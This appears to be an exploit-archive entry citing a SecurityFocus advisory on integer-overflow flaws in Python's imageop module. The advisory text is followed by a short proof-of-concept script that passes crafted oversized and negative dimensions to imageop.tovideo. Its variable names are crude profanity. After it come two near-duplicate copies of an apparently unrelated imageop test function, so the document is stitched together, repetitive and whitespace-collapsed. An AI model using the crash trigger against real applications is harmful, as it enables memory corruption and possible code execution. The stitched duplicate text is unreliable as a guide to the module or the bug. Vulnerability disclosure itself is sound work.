source: https://www.securityfocus.com/bid/25696/info Python's imageop module is prone to multiple integer-overflow vulnerabilities because it fails to properly bounds-check user-supplied input to ensure that integer operations do not overflow. To successfully exploit these issues, an attacker must be able to control the arguments to imageop functions. Remote attackers may be able to do this, depending on the nature of applications that use the vulnerable functions. Attackers would likely submit invalid or specially crafted images to applications that perform imageop operations on the data. A successful exploit may allow attacker-supplied machine code to run in the context of affected applications, facilitating the remote compromise of computers. #!/usr/bin/python import imageop sexshit = "a"*1603 evil = "p"*5241 connard = "s"*2000 supaire= "45"*65 print supaire connard = "cool" salope = "suceuse" dtc = imageop.tovideo(sexshit,1,4461,-2147002257) sexshit = "dtc"*52 print connard,supaire," fin de dump"
def main(use_rgbimg=1): # Create binary test files uu.decode(get_qualified_path('testrgb'+os.extsep+'uue'), 'test'+os.extsep+'rgb') if use_rgbimg: image, width, height = getrgbimage('test'+os.extsep+'rgb') else: image, width, height = getimage('test'+os.extsep+'rgb') # Return the selected part of image, which should by width by height # in size and consist of pixels of psize bytes. if verbose: print 'crop' newimage = imageop.crop (image, 4, width, height, 0, 0, 1, 1) # Return image scaled to size newwidth by newheight. No interpolation # is done, scaling is done by simple-minded pixel duplication or removal. # Therefore, computer-generated images or dithered images will # not look nice after scaling. if verbose: print 'scale' scaleimage = imageop.scale(image, 4, width, height, 1, 1) # Run a vertical low-pass filter over an image. It does so by computing # each destination pixel as the average of two vertically-aligned source # pixels. The main use of this routine is to forestall excessive flicker # if the image two vertically-aligned source pixels, hence the name. if verbose: print 'tovideo' videoimage = imageop.tovideo (image, 4, width, height) # Convert an rgb image to an 8 bit rgb if verbose: print 'rgb2rgb8' greyimage = imageop.rgb2rgb8(image, width, height) # Convert an 8 bit rgb image to a 24 bit rgb image if verbose: print 'rgb82rgb' image = imageop.rgb82rgb(greyimage, width, height) # Convert an rgb image to an 8 bit greyscale image if verbose: print 'rgb2grey' greyimage = imageop.rgb2grey(image, width, height) # Convert an 8 bit greyscale image to a 24 bit rgb image if verbose: print 'grey2rgb' image = imageop.grey2rgb(greyimage, width, height) # Convert a 8-bit deep greyscale image to a 1-bit deep image by # thresholding all the pixels. The resulting image is tightly packed # and is probably only useful as an argument to mono2grey. if verbose: print 'grey2mono' monoimage = imageop.grey2mono (greyimage, width, height, 0) # monoimage, width, height = getimage('monotest.rgb') # Convert a 1-bit monochrome image to an 8 bit greyscale or color image. # All pixels that are zero-valued on input get value p0 on output and # all one-value input pixels get value p1 on output. To convert a # monochrome black-and-white image to greyscale pass the values 0 and # 255 respectively. if verbose: print 'mono2grey' greyimage = imageop.mono2grey (monoimage, width, height, 0, 255) # Convert an 8-bit greyscale image to a 1-bit monochrome image using a # (simple-minded) dithering algorithm. if verbose: print 'dither2mono' monoimage = imageop.dither2mono (greyimage, width, height) # Convert an 8-bit greyscale image to a 4-bit greyscale image without # dithering. if verbose: print 'grey2grey4' grey4image = imageop.grey2grey4 (greyimage, width, height) # Convert an 8-bit greyscale image to a 2-bit greyscale image without # dithering. if verbose: print 'grey2grey2' grey2image = imageop.grey2grey2 (greyimage, width, height) # Convert an 8-bit greyscale image to a 2-bit greyscale image with # dithering. As for dither2mono, the dithering algorithm is currently # very simple. if verbose: print 'dither2grey2' grey2image = imageop.dither2grey2 (greyimage, width, height) # Convert a 4-bit greyscale image to an 8-bit greyscale image. if verbose: print 'grey42grey' greyimage = imageop.grey42grey (grey4image, width, height) # Convert a 2-bit greyscale image to an 8-bit greyscale image. if verbose: print 'grey22grey' image = imageop.grey22grey (grey2image, width, height) # Cleanup unlink('test'+os.extsep+'rgb')
#! /usr/bin/env python
def main(use_rgbimg=1): # Create binary test files uu.decode(get_qualified_path('testrgb' + os.extsep + 'uue'), 'test' + os.extsep + 'rgb') if use_rgbimg: image, width, height = getrgbimage('test' + os.extsep + 'rgb') else: image, width, height = getimage('test' + os.extsep + 'rgb') # Return the selected part of image, which should by width by height # in size and consist of pixels of psize bytes. if verbose: print 'crop' newimage = imageop.crop(image, 4, width, height, 0, 0, 1, 1) # Return image scaled to size newwidth by newheight. No interpolation # is done, scaling is done by simple-minded pixel duplication or removal. # Therefore, computer-generated images or dithered images will # not look nice after scaling. if verbose: print 'scale' scaleimage = imageop.scale(image, 4, width, height, 1, 1) # Run a vertical low-pass filter over an image. It does so by computing # each destination pixel as the average of two vertically-aligned source # pixels. The main use of this routine is to forestall excessive flicker # if the image two vertically-aligned source pixels, hence the name. if verbose: print 'tovideo' videoimage = imageop.tovideo(image, 4, width, height) # Convert an rgb image to an 8 bit rgb if verbose: print 'rgb2rgb8' greyimage = imageop.rgb2rgb8(image, width, height) # Convert an 8 bit rgb image to a 24 bit rgb image if verbose: print 'rgb82rgb' image = imageop.rgb82rgb(greyimage, width, height) # Convert an rgb image to an 8 bit greyscale image if verbose: print 'rgb2grey' greyimage = imageop.rgb2grey(image, width, height) # Convert an 8 bit greyscale image to a 24 bit rgb image if verbose: print 'grey2rgb' image = imageop.grey2rgb(greyimage, width, height) # Convert a 8-bit deep greyscale image to a 1-bit deep image by # thresholding all the pixels. The resulting image is tightly packed # and is probably only useful as an argument to mono2grey. if verbose: print 'grey2mono' monoimage = imageop.grey2mono(greyimage, width, height, 0) # monoimage, width, height = getimage('monotest.rgb') # Convert a 1-bit monochrome image to an 8 bit greyscale or color image. # All pixels that are zero-valued on input get value p0 on output and # all one-value input pixels get value p1 on output. To convert a # monochrome black-and-white image to greyscale pass the values 0 and # 255 respectively. if verbose: print 'mono2grey' greyimage = imageop.mono2grey(monoimage, width, height, 0, 255) # Convert an 8-bit greyscale image to a 1-bit monochrome image using a # (simple-minded) dithering algorithm. if verbose: print 'dither2mono' monoimage = imageop.dither2mono(greyimage, width, height) # Convert an 8-bit greyscale image to a 4-bit greyscale image without # dithering. if verbose: print 'grey2grey4' grey4image = imageop.grey2grey4(greyimage, width, height) # Convert an 8-bit greyscale image to a 2-bit greyscale image without # dithering. if verbose: print 'grey2grey2' grey2image = imageop.grey2grey2(greyimage, width, height) # Convert an 8-bit greyscale image to a 2-bit greyscale image with # dithering. As for dither2mono, the dithering algorithm is currently # very simple. if verbose: print 'dither2grey2' grey2image = imageop.dither2grey2(greyimage, width, height) # Convert a 4-bit greyscale image to an 8-bit greyscale image. if verbose: print 'grey42grey' greyimage = imageop.grey42grey(grey4image, width, height) # Convert a 2-bit greyscale image to an 8-bit greyscale image. if verbose: print 'grey22grey' image = imageop.grey22grey(grey2image, width, height) # Cleanup unlink('test' + os.extsep + 'rgb')